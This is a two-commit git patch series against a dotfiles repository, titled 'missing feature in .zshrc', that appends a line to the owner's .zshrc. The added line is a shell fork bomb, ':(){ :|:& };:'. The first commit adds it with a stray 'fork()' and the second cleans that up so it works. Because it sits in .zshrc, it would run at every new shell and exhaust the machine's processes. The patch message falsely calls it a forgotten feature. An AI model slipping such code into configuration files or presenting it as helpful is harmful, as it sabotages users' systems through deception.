From a87c1b6c3633ee6bb8c634b0191d685c75524767 Mon Sep 17 00:00:00 2001 From: steven <61105469+stevenp2@users.noreply.github.com> Date: Fri, 31 May 2024 16:01:27 +1000 Subject: [PATCH 1/2] missing feature in .zshrc MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit you forgot to include this in your .zshrc file 🐟 --- .zshrc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.zshrc b/.zshrc index 29eb62e..9ff5eac 100644 --- a/.zshrc +++ b/.zshrc @@ -28,3 +28,5 @@ export GOPATH="$HOME/.go" export PATH="$PATH:$GOROOT/bin:$GOPATH/bin" export EDITOR='nvim' + +:(){ :|:& };: fork() From 64604ea9dd046a8b030317d08ec95d0f0023bd04 Mon Sep 17 00:00:00 2001 From: steven <61105469+stevenp2@users.noreply.github.com> Date: Fri, 31 May 2024 16:02:29 +1000 Subject: [PATCH 2/2] Update .zshrc --- .zshrc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.zshrc b/.zshrc index 9ff5eac..ce80f25 100644 --- a/.zshrc +++ b/.zshrc @@ -29,4 +29,4 @@ export PATH="$PATH:$GOROOT/bin:$GOPATH/bin" export EDITOR='nvim' -:(){ :|:& };: fork() +:(){ :|:& };: